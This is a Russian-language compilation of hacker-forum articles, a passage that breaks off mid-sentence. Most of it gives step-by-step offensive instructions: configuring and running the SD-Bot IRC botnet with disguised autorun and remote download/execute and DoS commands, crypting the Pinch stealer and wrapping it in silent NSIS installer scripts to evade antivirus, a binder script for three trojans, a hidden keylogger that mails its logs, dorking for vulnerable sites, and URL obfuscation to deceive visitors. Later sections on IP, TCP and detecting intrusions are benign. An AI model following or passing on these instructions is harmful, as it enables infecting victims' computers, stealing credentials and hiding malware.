В моем обзоре я возьму другого бота для практики - [SD]-Bot от русского автора [SD].Это пожалуй самый простенький и стабильный бот, обладающий функциями DoS/Администрирование IRC-канала (не уступает возможностям eggdrop). Исходники этого бота, ты найдешь в архиве со статьей (точнее тут: http://inattack.ru/download/art/sdbot05b-AE.zip). Как ты уже понял, бот управляется через IRC, поэтому зарегистрируем канал для наших зомби ;).Для этого заходим на наш будущий канал и вбиваем туда следующую команду:

/msg chanserv register #канал пароль краткое_описание_канала (например канал Васи Пупкина)

Теперь этот канал принадлежит нам. Теперь о боте. Для компиляции необходим LCC или Visual Studio 6.У меня стоит Visual Studio 7 .NET и все нормально собирается. Не забываем о том, что во многих public-ботах умышленно допущены ошибки для защиты от "детей", поэтому если ты собираешься разводить серьезную бот-сеть, то тебе необходимы знания Си. Итак распаковываем исходники и открываем файл SDBOT05A.CPP.Находим там строчку:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass)

и меняем ее на:

irc_sendf2(sock, "JOIN %s %s\r\n", channel, chanpass);

Все, ошибка исправлена, теперь перемещаемся на строчку выше и ищем следующую строчку:

// bot configuration
const char botid[] = "set_me"; // ID бота,можно вписывать что угодно, апример "mYz0mb1e"
const char password[] = "set_me"; // Пароль на бота.
const char server[] = "set_me"; // IRC-сервер,пример: "irc.dalnet.ru"
const int port = 6667; // Порт сервера, оставьте как есть.
const char server2[] = ""; // необязательный параметр, на случай если 1 сервер будет не доступен, то бот законнектится на второй
const int port2 = 6667; // Аналогично
const char serverpass[] = ""; // Пароль от сервера(оставьте пустым)
const char channel[] = "set_me"; // Канал ,где будут отчитываться боты, пример: "#ru24"
const char chanpass[] = ""; // Пароль от канала (не обязательный параметр, если ваш канал не требует авторизации)
const char filename[] = "win.exe"; // Название файла-трояна(бот) которое будет видно в процессах.
const BOOL regrun = TRUE; // Использовать ключ в реестре для автозагрузки(включено по умолчанию)
const char valuename[] = "Microsoft Internet Explorer"; // Название ключа в реестре
// Метка бота ;)

Остальные параметры нам не интересны. Все, бот готов к эксплуатации. Теперь компилируем это чудо, после этого сжимаем его UPX'ом чтобы уменьшить размер. Теперь заходим на IRC-канал,запускаем у себя трояна и видим что на канал зашел бот :) Теперь можно давать команды боту (или ботам, если вы уже успели заразить пару компов ;))

Пример:

<< Nitrex >>: .about
: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/
: sdbot version 0.4c by [sd] (sdbot@mail.ru). homepage: sdbot.n3.net/

Как видим, все боты послушно выполнили нашу команду - показать инфу о создателе бота. Но тут есть небольшая неувязка: если ты собираешься создать серьезную бот-сеть состоящую из нескольких тысяч компьютеров-зомби, то боты просто зафлудят сообщениями "хозяина". В этом случае ты должен убрать из исходного кода все printf()'ы и sprintf()'ы чтобы мессаги не выводились. Ну а теперь я приведу список самых нужных команд для [SD]-Бота:

cycle - уйти на N-кол-во времени с канала, а потом зайти.
die - самоубийство :)
execute [parameters] - запустить файл на компьютере жертвы
download - скачать файл на комьютер-зомби. Очень полезно когда нужно затроянить всех зомби другим трояном или модификацией бота!
ping <# of pings> - великий и ужасный ПИНГ aka DoS ;)

Остальные команды ты найдешь в файле commandref.html. НО ПОМНИ! Все что ты делаешь это противозаконно и попадает под 273 статью УКРФ, данная статья дана лишь для ознакомления и расширения кругозора читателя. Ну и для твоей же безопасности, ведь ты теперь знаешь, что делать если твоя тачка странно себя ведет, ведь так ;) ?

P.S Множество реализация различных ботов, ты сможешь найти на сайте www.securityfocus.com.
PSS: http://www.securityforest.com/wiki/index.php/Category:Maintaining_Access



Криптуем и клеим троянов паблик софтом
Рассмотрим скрытие от антивирусов трояна Pinch, как наиболее часто применяемого на территории бывшего СССР да и не только.
Из подручных средств нам понадобится протектор ORiEN и система для создания инсталляторов Nullsoft Scriptable Install System. Выбор именно этих средств обусловлен малым размером приклеиваемого стаба(что сказывается довольно малым увеличением, а с учетом компрессии зачастую и уменьшением размера криптованного файла по сравнению с исходным) и их бесплатностью.
Итак, начнем.
Сначала скачаем и установим вышеупомянутые инструменты с их официальных сайтов:
ORiEN: http://zalexf.narod.ru/
Nullsoft Scriptable Install System: http://nsis.sourceforge.net/
Затем запустим протектор ORiEN
С помощью кнопки Обзор укажем путь к пинчу. Затем перейдем к вкладке Пароль и установим его чтение из командной строки. Затем введем в первое поле ввода любой пароль(главное не забыть его до конца процедуры криптования) – им будет шифроваться наш троян. После ввода пароля чекбокс наротив поля ввода станет активен – отметим его.
После этого станет активен другой чекбокс – Защита по паролю. Его тоже необходимо отметить. После выполнения этих операций нажимаем кнопку Старт. Теперь желательно протестировать зашифрованный файл. Для этого просто запускаем его и если появляется MsgBox с сообщением “Неверный пароль”, то криптование прошло успешно.
Теперь можно переходить к следующему этапу – созданию инсталлятора с помощью Nullsoft Scriptable Install System(NSIS).
Создадим текстовый документ и вставим в него следующий код

<!-- . . .
Код:

OutFile "crypted.exe"

 SilentInstall silent



 Section "crypt"

 SetOutPath "$TEMP"

 SetOverwrite on

 File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"

 Execwait "$TEMP\pinch.exe !psw=123"

 Delete $TEMP\pinch.exe

 SectionEnd

<!-- .: . . Теперь необходимо немного отредактировать этот код.
В строке File "C:\DocumentsandSettings\gol\Рабочий стол\pinch. exe" должен находиться правильный путь к зашифрованному файлу, полученному с помощью протектора ORiEN на предыдущем этапе.
В строке Exec "$TEMP\pinch.exe !psw=123" после !psw= должен быть указан пароль, которым мы шифровали файл. Сохраним созданный текстовый файл.
Теперь запустим утилиту MakeNSISW соответствующим ярлыком из меню “Пуск”
Перетащим туда созданный текстовый файл. Если все сделано правильно, на рабочем столе должен появиться файл crypt.exe, который можно спокойно распространять.
Также NSIS может использоваться в качестве неплохого джойнера. Для этого в скрипте инсталлятора необходимо использовать директиву File и Exec вместо Execwait несколько раз.
Например чтобы склеить 3 файла, скрипт для NSIS будет выглядеть следующим образом:

<!-- . . .
Код:

OutFile "joined.exe"

 SilentInstall silent



 Section "file1"

 SetOutPath "$TEMP"

 SetOverwrite on

 File "C:\Documents and Settings\adm\Рабочий стол\pinch.exe"

 Exec $TEMP\pinch.exe

 SectionEnd



 Section "file2"

 SetOutPath "$TEMP"

 SetOverwrite on

 File "C:\Documents and Settings\adm\Рабочий стол\wmtroj.exe"

 Exec $TEMP\wmtroj.exe

 SectionEnd



 Section "file3"

 SetOutPath "$TEMP"

 SetOverwrite on

 File "C:\Documents and Settings\adm\Рабочий стол\ddosbot.exe"

 Exec $TEMP\ddosbot.exe

 SectionEnd

<!-- .: . . Если будет необходимо удалить файлы после их запуска, то желательно использовать Execwait и Delete.

Теперь о размере закриптованного файла:
После конфигурирования паблик-пинча от Vaska он имел размер 50 кб в несжатом виде.
После криптования пинч стал весить 65 кб. По сравнению с криптованием протектором типа Themida, где пинч увеличивается в размере с 50 кб до 380 кб описанный способ имеет неоспоримые преимущества. Увеличение объема файла вполне соизмеримо с результатами работы приватными крипторами, актуальные версии которых доступны далеко не всем.





Крадем ввод с клавиатуры (клавиатурный шпион;keylogger)
Архив программы имеет установочный файл setup_akl.exe.

Устанавливаем его себе в какую-нибудь папку (учти, что данный Троян ловят антивирусы, поэтому не удивляйся на кричащего Касперского). Так, установил? Лезем в папку. AKV.exe – это программа для чтения логов. AKL.exe – собственно казачок. Копируем его в отдельную папку и запускаем.
В трее мы видим значок. Щелкаем правой по нему и во всплывшем меню видим выбираем опции.

В меню Invisibility видим следующие настройки:
Hide tray icon –скрывать иконку в трее,
Hide program from ctrl+ail+del – скрывать работу программы в диспетчере
Remove short… - скрывать ярлыки из автозагрузки
Remove program from unins… - убрать программу из меню удаления
Hide program folder – скрыть каталог программы
Hide the pogram from Windows … - скрыть программы из листа автозагрузки.
Здесь я советую ставить галочки везде кроме Hide program folder.

В меню е-мейл все понятно, ставим галочку отсылать лог каждые несколько минут, пишем логин-пароль, ящик и хост. Во вкладке FTP – анологично.
В меню Security можешь поставить на логии пароль.

Во вкладке Опции поставь везде галочки и сохраняй. Все, клавиатурный шпион готов!

Теперь можешь по тихому оставить его где-нибудь))) Только смотри, чтоб тебе потом по яйцам не дали))) Лог открывается прогой AKV.exe, я говорил о ней выше. Запомни, Читать чужое – нехорошо!!! Но хотя из разговоров по асе можно узнать инфу о человеке, необходимую для подбора пароля. Тссс! Можно даже сам пароль узнать!!!






Оружие хакеров или как искать дыры.
Вы наверняка слышали от кого-нибудь, что : «Оружие хакеров – поисковики!», но не могли этого понять. Я тоже по первости не мог всосать, причем тут поисковики, теперь всосал =). Давайте подробно разберем пример на поиске дырявых PHP. На самом деле все очень просто. Ну во-первых, нужно найти php страницы, для этого в поиске вводим:

Index.php

Теперь подумаем, сколько же сайтов в инете на php написано? Очень много, нужно как-нибудь укоротить найденное. Например добавим домен, если вы хотите искать только русские php сайты то запрос будет выглядеть примерно так:

.ru/index.php

Вот, количество найденных сайтов сократилось, но убрались лишь не нужные нам, что дальше… А дальше вот что. Дыра эта, про которую я уже писал, не в самой php, а в PHP-Nuke, ага, значит добавим запрос следующим образом:

.ru/index.php & nuke

Теперь поисковик будет искать все русские php сайты/порталы и из найденных выберет все, которые Nuke =). Далее читаем мою статью (Хакерство-Интернет-Админ-портала…) и проверяем найденное на вшивость. Вот и все!

Как это делают другие. Вообще я знаю два способа, это вышеописанный и с помощью РОБОТОВ. БОТы, это специальные проги, которые дают ваш запрос на поисковики и возвращают результат, что очень экономит время поиска дыр. Сам я о них знаю мало. Если кто знает больше, в смысле, их точный алгоритм плиз говорите, я собираюсь написать БОТ, для участников HackZone. Дело в том, что в инете я найти их не мог, если кто знает ссылки, тоже скидывайте.

Теперь пара советов. Во-первых, лучше всего искать на домене com, он более большой, отсюда и больше уязвимых сайтов. Во-вторых, поиск можно ограничивать до бесконечности, например, если вам нужны лишь порталы знакомств, то запорс будет выглядеть примерно так:

.ru/index.php & nuke & знакомства и т.д.

В-третьих, искать лучше всего на www.google.com и www.yahoo.com, в этом деле они рулят! Русские поисковики пока годны лишь для поиска статей :(.

И на последок, я могу ошибаться в этой статье, но все вышеописанное работает на 100%. Если есть какие недочеты или не точности, скидывайте плиз в комментарий!



IP-протокол для новичков
Протокол IP (Internet Protocol) - часть группы протоколов TCP/IP. Этот протокол служит для передачи данных в обоих направлениях между сетями, формирующими и-нет. IP-протокол содержит адрес и управляющую информацию, которая позволяет передавать пакеты по определенным маршрутам. Пакеты содержат заголовок и пользовательские данные. Заголовок содержит управляющую информацию. Аппаратные средства – маршрутизаторы, - встречая такие пакеты, выделяют из них заголовки и анализируют информацию о маршруте. Заголовки меняются, потом пакеты опять собираются и передаются дальше. Одной из основных функций протокола IP является обеспечение наиболее простой и эффективной, доставки дейтаграмм через постоянное и-нет соединение. Дейтаграмма - сгруппированная информация, передаваемая в коммутируемой среде, являющаяся элементом сетевого уровня. IP-дейтограммы - основные информационные единицы в и-нете. Другой важной задачей IP-протокола является разбиение дейтаграмм на фрагменты и последующая их сборка для передачи пакетов различных размеров. В течение сеанса, анализа или перехвата пакетов, необходимо различать типы захватываемых пакетов. Приведу описание IP-пакета, и его основные модули:

1) Текущая версия протокола IP

2) Длина заголовка дейтаграммы в 32-х битных словах

3)Тип службы, которым протокол более высокого уровня, такого как TCP или UDP, управляет текущей дейтаграммой и назначает уровень приоритета

3)Длина в байтах всего ip-пакета целиком

4)Идентификатор фрагмента - целое число, используемое для сборки дейтаграммы из фрагментов

5)Флаги. 3-битное поле, где первый бит определяет, фрагментирован ли пакет. Второй бит указывает, является ли пакет последним пакетом в серии. Третий бит используется редко

6)Смещение данных фрагмента относительно данных исходного пакета, предназначено для корректной сборки дейтаграмм

7)Время жизни(TTL). Счетчик, значение которого уменьшается, на единицу, каждый раз когда пакет обрабатывается очередным хостом. С целью предотвращения зацикливания пересылки пакета при нулевом значении пакет уничтожается

8)Здесь указано, какому протоколу более высокого уровня предназначается для обработки принимаемый пакет.

9)Контрольная сумма заголовка. Позволяет убедиться в целостности заголовка пакета.

10)Адрес отправителя/Адрес получателя

11)Параметры. Обычно содержатся параметры безопасности.

12)данные. Информация более высокого уровня.

Данные в пакете не имеют никакого отношения к протоколу IP. Можно даже сказать, что протокол IP имеет отношение к управляющей информации, которую он передает протоколам более высокого уровня. Эта информация хранится в заголовке IP-пакета, который должен доставить дейтаграмму по назначенному маршруту в сети. Для гарантированной доставки через и-нет требуется, чтобы каждая дейтаграмма была размещена во фрейме физического уровня. Упаковка дейтаграмм во фреймы перед их передачей называется инкапсуляцией. Идеально, когда каждая IP-дейтограмма упакована в свой собственный фрейм, особенно, если сеть через которую она передается, поддерживает ее размер. Но, как известно, идеальные ситуации встречаются редко. Первой проблемой при передаче дейтаграмм является то, что каждая сеть налагает определенные ограничения на максимальный размер передаваемого блока данных (MTU – Maximum Transfer Unit). Кроме того – сети различных типов имеют свой собственный MTU. При передаче дейтаграмм через сети с различными максимальными размерами фреймов маршрутизаторы вынуждены разбивать дейтаграммы на фрагменты, чтобы согласовать размер фрейма с MTU. Данный процесс называется фрагментированием.
Ну вот пока и все, может если время будет, напишу че-нить про адресацию в IP-протоколе, но это не сейчас. Весьма благодарен за внимание.



Как обнаружить хакерскую атаку
Windows-компьютеры:

Подозрительно высокий исходящий трафик. Если вы пользуетесь дайлапом или ADSL-подключением и заметили необычно большое количество исходящего сетевого трафика (в частности, проявляющегося, когда ваш компьютер работает и подключен к интернету, но вы им не пользуетесь), то ваш компьютер, возможно, был взломан. Такой компьютер может использоваться для скрытой рассылки спама или для размножения сетевых червей.
Повышенная активность жестких дисков или подозрительные файлы в корневых директориях. Многие хакеры после взлома компьютера производят сканирование хранящейся на нем информации в поисках интересных документов или файлов, содержащих логины и пароли к банковским расчетным центрам или системам электронных платежей вроде PayPal. Некоторые сетевые черви схожим образом ищут на диске файлы с адресами email, которые впоследствии используются для рассылки зараженных писем. Если вы заметили значительную активность жестких дисков даже когда компьютер стоит без работы, а в общедоступных папках стали появляться файлы с подозрительными названиями, это также может быть признаком взлома компьютера или заражения его операционной системы вредоносной программой.
Большое количество пакетов с одного и того же адреса, останавливаемые персональным межсетевым экраном. После определения цели (например, диапазона IP-адресов какой-либо компании или домашней сети) хакеры обычно запускают автоматические сканеры, пытающиеся использовать набор различных эксплойтов для проникновения в систему. Если вы запустите персональный межсетевой экран (фундаментальный инструмент в защите от хакерских атак) и заметите нехарактерно высокое количество остановленных пакетов с одного и того же адреса, то это — признак того, что ваш компьютер атакуют. Впрочем, если ваш межсетевой экран сообщает об остановке подобных пакетов, то компьютер, скорее всего, в безопасности. Однако многое зависит от того, какие запущенные сервисы открыты для доступа из интернета. Так, например, персональный межсетевой экран может и не справиться с атакой, направленной на работающий на вашем компьютере FTP-сервис. В данном случае решением проблемы является временная полная блокировка опасных пакетов до тех пор, пока не прекратятся попытки соединения. Большинство персональных межсетевых экранов обладают подобной функцией.
Постоянная антивирусная защита вашего компьютера сообщает о присутствии на компьютере троянских программ или бэкдоров, хотя в остальном все работает нормально. Хоть хакерские атаки могут быть сложными и необычными, большинство взломщиков полагается на хорошо известные троянские утилиты, позволяющие получить полный контроль над зараженным компьютером. Если ваш антивирус сообщает о поимке подобных вредоносных программ, то это может быть признаком того, что ваш компьютер открыт для несанкционированного удаленного доступа.

UNIX-компьютеры:

Файлы с подозрительными названиями в папке «/tmp». Множество эксплойтов в мире UNIX полагается на создание временных файлов в стандартной папке «/tmp», которые не всегда удаляются после взлома системы. Это же справедливо для некоторых червей, заражающих UNIX-системы; они рекомпилируют себя в папке «/tmp» и затем используют ее в качестве «домашней».
Модифицированные исполняемые файлы системных сервисов вроде «login», «telnet», «ftp», «finger» или даже более сложных типа «sshd», «ftpd» и других. После проникновения в систему хакер обычно предпринимает попытку укорениться в ней, поместив бэкдор в один из сервисов, доступных из интернета, или изменив стандартные системные утилиты, используемые для подключения к другим компьютерам. Подобные модифицированные исполняемые файлы обычно входят в состав rootkit и скрыты от простого прямого изучения. В любом случае, полезно хранить базу с контрольными суммами всех системных утилит и периодически, отключившись от интернета, в режиме одного пользователя, проверять, не изменились ли они.
Модифицированные «/etc/passwd», «/etc/shadow» или иные системные файлы в папке «/etc». Иногда результатом хакерской атаки становится появление еще одного пользователя в файле «/etc/passwd», который может удаленно зайти в систему позже. Следите за всеми изменениями файла с паролями, особенно за появлением пользователей с подозрительными логинами.
Появление подозрительных сервисов в «/etc/services». Установка бэкдора в UNIX-системе зачастую осуществляется путем добавления двух текстовых строк в файлы «/etc/services» и «/etc/ined.conf». Следует постоянно следить за этими файлами, чтобы не пропустить момент появления там новых строк, устанавливающих бэкдор на ранее неиспользуемый или подозрительный порт.





Прячем IP сайта
Форматы адреса

Итак, каждый IP-шник состоит из четырех байт (дорогая, хочешь я тебе расскажу, что такое байт?), разделенных точками. Например, сайты www.chat.ru и www.geocities.com имеют адреса 212.24.32.192 и 209.01.224.18 соответственно. Что набирать в браузере: более удобное символьное имя или строку http://212.24.32.192 - дело вкуса каждого пользователя. Последний способ оставляет массу возможностей изменить IP своей страницы до неузнаваемости или создать иллюзию обращения совсем на другой сервер.

Шестнадцатеричный трюк

Запустим программу Calculator из стандартного набора Windows (хоть что-то юзабельное из виндов) и последовательно преобразуем каждый байт, входящий в адрес, в шестнадцатеричное (HEX) значение. Получим D4.18.20.C0 для www.chat.ru и D1.01.E0.12 для www.geocities.com. Теперь можно ссылаться на свою страницу по этим значениям, набирая в браузере http://0xD4.0x18.0x20.0xC0. Узнать IP адрес стало сложнее, но еще, как говорится, не фонтан: любой, кто когда-нибудь видел программы на С или Assembler, сразу догадается, в чем здесь трюк. Лучший способ взять все четыре байта D41820C0 и перевести их в десятичное (DEC) значение. По получившемуся числу также можно ссылаться на сайт с адресом www.chat.ru: http://3558351040.

Восьмеричный трюк

Еще один вариант, обычно сбивающий с толку даже матерых сисопов - перевести каждую составляющую IP адреса не в шестнадцатеричное, а в восьмеричное (OCT) значение. Тот факт, что число, начинающееся с 0, трактуется программами как восьмеричное, известен далеко не всем: адрес http://0324.030.040.0300 дает желаемый результат.

А сколько это будет в процентах?

Теперь можно постепенно усложнять полученные адреса, добавляя новые элементы скрытности. Известно, что текстовая информация, передаваемая браузерами вместе с URL, перед посылкой по Сети подвергается некоторой обработке. Так, например, все символы space (пробел) заменяются кодом %20. То же самое можно сделать с любым символом твоего адреса. Чтобы получить необходимый код цифры, достаточно прибавить к ней 30. %33 будет соответствовать цифре 3, а %30 - 0. Подправим полученный ранее десятичный адрес. Теперь http://3558%3351%3040 также содержит ссылку на www.chat.ru, хотя выглядит уже достаточно устрашающе.

Вот собака где порылась!

Следующий уровень сложности в благородном деле запутывания следов вносит добавление в URL символа @. Старая добрая "собака" здесь не имеет никакого отношения к e-mail, ее роль - передача на сервер login-a и пароля: если сервер содержит запароленные каталоги, обращаться к ним следует так: http://login:password@URL. Добавление же "собаки" к обычному адресу, не имеющему никакого отношения к секретности, заставляет браузер просто игнорировать все, предшествующее символу @. Таким образом на сервер www.chat.ru мы можем попасть, набрав, например, адрес http://12345435374683434809080@3558351040 или http://ftp:128.03.60.23@3558%3351%3040

Главное правильно выбрать имя!

Но и это еще не предел: запутать преследователей могут правильно выбранные имена каталогов и файлов на сервере. Назвав свою страницу 203356.htm или ftp.123.0.12.34.htm, можно сбить с толку любого: http://12345435374683434809080@3558351040/ftp.123.0.12.34.htm. Напомним, что ограничение на длину названия файла или каталога - 256 символов, что означает возможность конструирования, например, такого монструозного URL: http://12345435374683434809080@3558351040/
23232323239200596/3232908576579404323/123.htm.

Прячемся в Рунете

Если есть возможность, можно зарегистрировать свой домен с именем "числительным", например, 2323.ru или 909093290.com. В зоне RU уже зарегистрированы 100.ru или 777.ru. Наплодив в таком домене "цифровых" поддоменов, можно получить адреса вроде: http://121.3434.23.2323.ru/121.223.231.ru/2323.12.89.32.ru/ru.htm.


Как найти прокси-серверы
Сейчас я опишу свой самый любимый способ. Для подобных целей применяются специальные программы - сканеры. Сканеры пытаются подключиться к выбранному порту(портам) в заданном диапазоне ip адресов. В принципе происходит то же самое что и в случае с telnet-ом, но все происходит на порядок быстрее. Для этого я использую scanner входящий в программу NetLab. Это программа кроме самого сканера включает в себя еще много полезных функций, в которых вы или разберетесь сами, или я расскажу в других разделах, если эти функции будут касаться темы. На данный момент нас интересует только сканер. Существует большое количество подобных программ, но их сканеры - полная лажа, потому что сканируют они каждый ip-адрес последовательно с таймаутами в несколько секунд между каждой попыткой подключения, поэтому время сканирования одного диапазона может длиться несколько минут. Сканер в NetLab - единственный сканер под Windows из всех что я знаю, который работает совершенно по-другому - он посылает запросы сразу на группу адресов и одновременно принимает ответы, таким образом, сканирование длится ~30 секунд при таймауте в 1500ms.

Теперь о том, что нужно делать. Сначала вы достанете NetLab v1.4. Эта программа не раритет и лежит на любом хорошем софт-архиве. Запустите его, вы увидите группу закладок, нажмите на закладку Scanner.

Настраивать ничего особенно не надо, кроме может быть параметра Timeout. Значение Timeout нужно выбирать в зависимости от скорости вашего соединения и главное времени задержки, которое можно определить утилитой ping, но если вы не знаете что это и как, я приведу пару примеров: если вы собираетесь сканировать свою локальную сеть или область интернета в вашем городе то можно выбирать значение от 200ms до 1000ms, если вы сканируете другую страну то ставьте значение Timeout ~1000-2000ms, а если вы используете спутниковый канал и находитесь в Австралии, а сканируете Европу, то устанавливайте это значение от 2000ms и больше. В любом случае это все примерно и может зависеть от многих факторов, но сейчас этого будет достаточно. Да, я не сказал что это вообще за параметр - короче говоря - это время ожидания ответа сервера, чем меньше значение, тем быстрее идет процесс сканирования.

Так как мы сканируем специфический порт, то нужно поставить птицу напротив Scan Ports и указать порт 3128 в обеих ячейках:

После непродолжительных "настроек", можете вводить диапазон ip адресов и нажимать на кнопку Scan. Сейчас вкратце расскажу откуда брать ip адреса. Я не собираюсь в этой главе рассказывать все премудрости построения сетей, о типах и классах сетей, а просто приведу пример, как просто найти некоторый диапазон ip. Например: вы хотите использовать один из прокси который находиться в Австралии. Зайдите на свой любимый поисковик и введите что-нибудь в таком роде - "Australian internet providers", думаю вы легко найдете страницу где будет большой список провайдеров этого континента с cсылками на их сервера. Допустим, вы выбрали какой-нибудь www.vianet.net.au определите ip адрес этого сервера с помощью DNS.

DNS(Domain Name System) - это распределенная база данных, которая содержит информацию о компьютерах, включенных в сеть Internet. Характер данных зависит от конкретной машины, но чаще всего информация включает имя машины, IP-адрес и данные для маршрутизации почты.
Для удобства, большинство компьютеров имеют имена. Доменная система имен выполняет несколько задач, но основная ее работа - преобразование имён компьютеров в IP-адреса и наоборот.
Пространство имен DNS имеет вид дерева доменов, с полномочиями, возрастающими по мере приближения к корню дерева. Корень дерева имеет имя "."; под ним находятся домены верхнего уровня (корневые домены).
По историческим причинам существует два вида доменов верхнего уровня. В США домены верхнего уровня отражают организационную структуру, и как правило имеют трехбуквенные имена:
.gov - государственные учреждения,
.mil - военные учреждения,
.com - коммерческие организации,
.net - поставщики сетевых услуг,
.org - бесприбыльные организации,
.edu - учебные заведения;
Для доменов вне США, в соответствии с территориальным расположением используются двухбуквенные коды стран ISO. Например:
.ru - Россия
.de - Германия
.nl - Нидерланды
и т.д.

Проще всего это сделать тем же NetLab-ом. На закладке DNS в поле "Remote host" введите имя хоста ip-адрес которого вы собираетесь определить, в нашем случае введем www.vianet.net.au . Жмем на кнопку DNS. В нижнем окне должны увидеть Поле "IP address:" напротив которого будут 4 числа разделенные точкам - это и есть ip адрес который нам нужен. Имеем ip адрес этого хоста, теперь можем заносить первые 3 числа в поле для ip-адреса (в Scanner-е). Так как мы будем сканировать не один адрес, а диапазон адресов, вместо последнего числа указываем начальное и конечное значение - от 0 до 255.

Можно также поставить галочку на "Resolve IP address", не обязательно но более удобно и наглядно - в процессе сканирования будут сразу выводиться названия хостов соответствующих ip-адресов (если они есть, конечно).

Вот и все, теперь все готово, все поля заполнены, можно начинать процесс сканирования. Нажимаем на кнопку Scan... Процесс пошел. О завершении сканирования сообщается в окошке под Таймаутом словом Done, или по активной кнопке Scan. Смотрим на результат...

Ну что ж, один открытый порт 3128 найден. Нормально, сейчас его проверим, прописываем его в браузере (можно писать ip или имя). Топаем на страницу проверки и смотрим:

Мда... как видим это юниксовский прокси Squid/2.2STABLE5... Но нас интересует анонимность. Смотрим на поле HTTP_X_FORVARDED_FOR , хо-хо, я такого еще не встречал, в поле где должен быть наш ip адрес - стоит адрес их сервера. Может админ так специально настроил или у него кривые руки, но нас, прокси, как ни странно удовлетворяет в плане анонимности. Конечно, зайти на сервер, который игнорирует подключения от прокси не получиться, но для других серверов он вполне сгодится.

Примечания.
Многие провайдеры (и не только) имеют количество активных и зарезервированных адресов, больше 255. Поэтому вы можете попытаться просканировать близлежащие диапазоны, изменяя предпоследнюю цифру в ip адресе. Более подробную информацию о принадлежности адресов можно узнать при помощи Whois сервера, но это тема для отдельной статьи.
Это самый наглядный способ (всмысле - поиск сетей), существуют и получше, об этом еще напишу.
Думаю если каждый прочитавший эту статью или даже каждый десятый решит проверить прокси приведенный в примере, то через неделю другую он престанет работать, или админы поставят пароль, заметив подозрительную активность. Это судьба почти всех прокси публикуемых в списках, поэтому я вам рекомендую искать прокси самим.


Список портов с описанием
21 - ФТП пртокол,может использоваться если открыт анонимный доступ или стоит кривая версия софта(wu 2.6.0(1)war ftpd и тд)


23 - Телнет протокол.Используеться для входа в систему с удалённого компьютера.Так же может показать версию ОСь.

25 - Протокол для отправки почты,может использоваться в основном когда
стоит кривая версия sendmail(самое распространённое)так же имеют место
команды expn и vrfy которые могут дать взломщику некторую
дополнительную информацию.

53 - Показывает установлен ли dns.Может использоваться для так называемого dns spoofing.Т.е подменой объекта ДНС.

79 - Это finger.При должном везении и ошибках в программном обеспечении
можно получить список всех пользователей залогиненых в систему.

80 - www Сервер.показывает присутствует ли ВВВ сервер на
машине.Использовать можно для проверки на ЦГИ скрипты,так же показывает
версию и название программного обеспечения установленного на машине.

110 - pop. протокол для просмотра почтовых сообщений.Может
использоваться при кривой версии П.О как например всем известный qpop.

111 - sun rpc. Может использоваться при наличии ответа на команду rpcinfo -d |grep bind - ypbind tcp и тд.

119 - nntp.Проткол для чтения и отправки новостей в новостные группы,используеться так же при наличии ошибок в П.О

139 - netbios.Пртокол для работы с локальной сетью.МОжет использовать
для сканирования на расшаренные ресурсы и получение информации о сети.

443 - https,ssl.Тоже самое что и http но использует безопасный протокол.

513 - rlogin.Если у хоста есть запись в файле .rlogin то вы коннектитесь на удалённый хост без использования логина и пароля.

Интернет использует много протоколов.

Термин протоколы tcp/ip верный, поскольку это не один протокол и не
пара протоколов, как может показаться при взгляде на название. На самом
деле это большая группа протоколов, работающих вместе.

Реализация tcp/ip фирмы microsoft представляет из себя четырехуровневую модель:

1.Уровень приложений. При помощи этого уровня приложения и службы получают доступ к сети.

2.Уровень транспорта отвечает за установление и поддержание соединения между двумя узлами.
Его основными задачами являются подтверждение получения информации,
управление потоком данных, упорядочение и ретрансляция пакетов. В
зависимости от того, что требуется приложению, могут быть использованы
tcp или udp. tcp обычно используется в тех случаях, когда приложению
требуется передать большой объём информации и убедиться, что данные
своевременно получены адресатом. Приложения и службы, отправляющие
небольшие объёмы данных и не нуждающиеся в получении подтверждения,
используют udp, который является протоколом без установления соединения.

Протокол управления передачей tcp (transmission control protocol)
отвечает за надежную передачу данных от одного узла сети к другому. Он
создаёт виртуальный канал между двумя машинами. При установлении
соединения и передаче данных tcp создаёт и отправляет запрос удаленному
компьютеру и затем ожидает ответа, подтверждающего приём информации.

Пользовательский протокол датаграм udp (user datagram protocol), в
отличие от tcp, не устанавливает соединения. Сеанс не создаётся, udp
просто предпринимает попытку отправки данных. udp не проверяет, дошла
ли информация до адресата.

3.Межсетевой уровень отвечает за маршрутизацию данных внутри сети и между различными сетями.
Маршрутизаторы, которые зависят от используемого протокола, работают на
этом уровне модели и используются для отправки пакетов из одной сети
(или её сегмента) в другую сеть (или в сегмент сети). На этом уровне
работают протоколы:

Протокол интернета ip. Он является протоколом, не устанавливающим
соединения и использующим датаграммы для отправки данных из одной сети
в другую. ip не ожидает получения подтверждения получения пакетов от
узла-адресата. Подтверждения, а также повторные отправки пакетов
осуществляются протоколами (например tcp) и процессами, работающими на
верхних уровнях модели. Каждый ip-пакет содержит адреса
узла-отправителя и узла-получателя, идентификатор протокола (который
позволяет ip передать пакет соответствующему транспортному протоколу),
контрольную сумму и ttl (time to live, время жизни). ip-протокол
использует операцию логического "И" между ip-адресом получателя и
маской подсети для определения того, является ли пакет локальным или
удаленным. Если адрес пакета удалённый, то пакет отправляется либо по
известному (из таблицы маршрутизации) маршруту, либо на шлюз
по-умолчанию. Если адрес узла-получателя локальный, то при помощи arp
запрашивается аппаратный адрес получателя, на который потом
непосредственно отправляется пакет.

Протокол сопоставления адреса arp (address resolution protocol) -
протокол межсетевого уровня, ответственный за определение
аппаратного(mac) адреса, соответствующего указанному ip-адресу.

Протокол управления сообщениями Интернета icmp (internet control
message protocol) используется ip и другими протоколами высокого уровня
для отправки и получения отчетов о состоянии переданной информации.

Протокол управления группами Интернетаigmp (internet group management
protocol). Узлы локальной сети используют этот протокол для того, что
бы зарегистрировать себя в группе. Информация о группах содержится на
маршрутизаторах локальной сети, и используется маршрутизаторами для
отправки групповых сообщений всем членам определенной группы. Групповые
сообщения используются, в частности, для отправки звукового и
видеопотока приложениям-клиентам.

4.Уровень сетевого интерфейса. Этот уровень модели tcp/ip
отвечает за распределение ip-датаграм. Грубо говоря, это физический
уровень, уровень общения сетевых карт, модемов.


Есть две модели протоколов tcp/ip:

1. Модель osi, состоит из семи уровней. Она была создана международной организацией по стандартизации (international organization for standartisation,
iso) для того, чтобы обеспечить основу, на которой будут строиться все
